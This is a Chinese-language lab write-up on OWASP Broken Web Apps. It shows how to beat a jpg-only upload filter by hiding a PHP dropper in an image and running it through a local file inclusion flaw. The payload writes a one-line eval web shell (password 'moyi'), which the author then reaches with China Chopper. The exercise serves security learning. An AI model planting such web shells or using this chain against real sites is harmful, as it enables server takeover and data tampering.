高安全级别文件上传结合文件包含漏洞渗透web实验

中低安全级别的文件包含漏洞利用

实验环境

kali
owasp_broken_web_apps
windows 10

实验工具

中国菜刀,burpsuit,图片木马插入工具,一句话木马

实验内容:
打开owasp_broken_web_apps的网址并将文件上传漏洞安全级别为高级即只可以上传,后缀为jpg格式的图片,无法上传php文件,也无法通过代理绕过,(即使通过代理修改后缀绕过,一句话木马功不能得到发挥,不可执行删改等操作),此时web网站正好有本地文件包含漏洞。则可以利用此漏洞将隐藏在图片中的木马执行。

文件包含:
是一个方便与开发人员缩减代码量的一种方法。直接将另一个文件调用过来。

实验过程:
在网络上下载一张小图片,将器拖拽到edjpgom工具上,打开工具后,在空白处写上小马:
<?fputs(fopen("shell66.php","w"),'<?php eval($_POST[moyi]);?>') ?>
点击OK注入图片。
高安全级别文件上传结合文件包含漏洞渗透web实验将刚刚注入的图片上传到目标网站:
高安全级别文件上传结合文件包含漏洞渗透web实验文件上传后,我们使用网站后台,其uploads目录下可以看到被注入木马的图片已上传成功。高安全级别文件上传结合文件包含漏洞渗透web实验 此处也可以看到我们的一句话木马被注入图片后的样子。在该目录下使用vim shell66.jpg可以看到图片的编码,如下图所示:

高安全级别文件上传结合文件包含漏洞渗透web实验 上传了图片后木马是无法执行的,只是一些图片数据被传送到了web的数据库,web并不会主动去执行一张图片。但是我们知道了此web’网站还有文件包含漏洞,所以可以利用这个漏洞,使web主动的去执行它,
在url中page=?写上上传的木马图片的地址,木马文件的名称,点击enter ,文件被包含到该页面上部并且将隐藏在其中的木马文件执行了一遍。
高安全级别文件上传结合文件包含漏洞渗透web实验该木马的含义是将生成一个名称为shell66.php的文件,内容为<?php eval($_POST[moyi]);?>.
我们在程序后端来到该页面的下查看是否生成成功,如下图所示,在刚刚包含图片的网页目录下已经生成了 shell66.php文件。可以打开中国菜刀尝试连接看是否成功。
高安全级别文件上传结合文件包含漏洞渗透web实验

右键添加地址,填我们生成php文件的目录,密码为代码中的moyi,点击添加即可,
高安全级别文件上传结合文件包含漏洞渗透web实验菜刀成功连接到木马。并且可以执行删改等操作,获取shell成功。
高安全级别文件上传结合文件包含漏洞渗透web实验总结:
文件包含漏洞,由本地包含和远程包含,本地包含需要先将木马上传到web而远程包含只需将木马放在远程服务器即可,更加的简单。

提出的疑问:
问什么文件包含之后web会自动执行,注入在图片中的小马呢?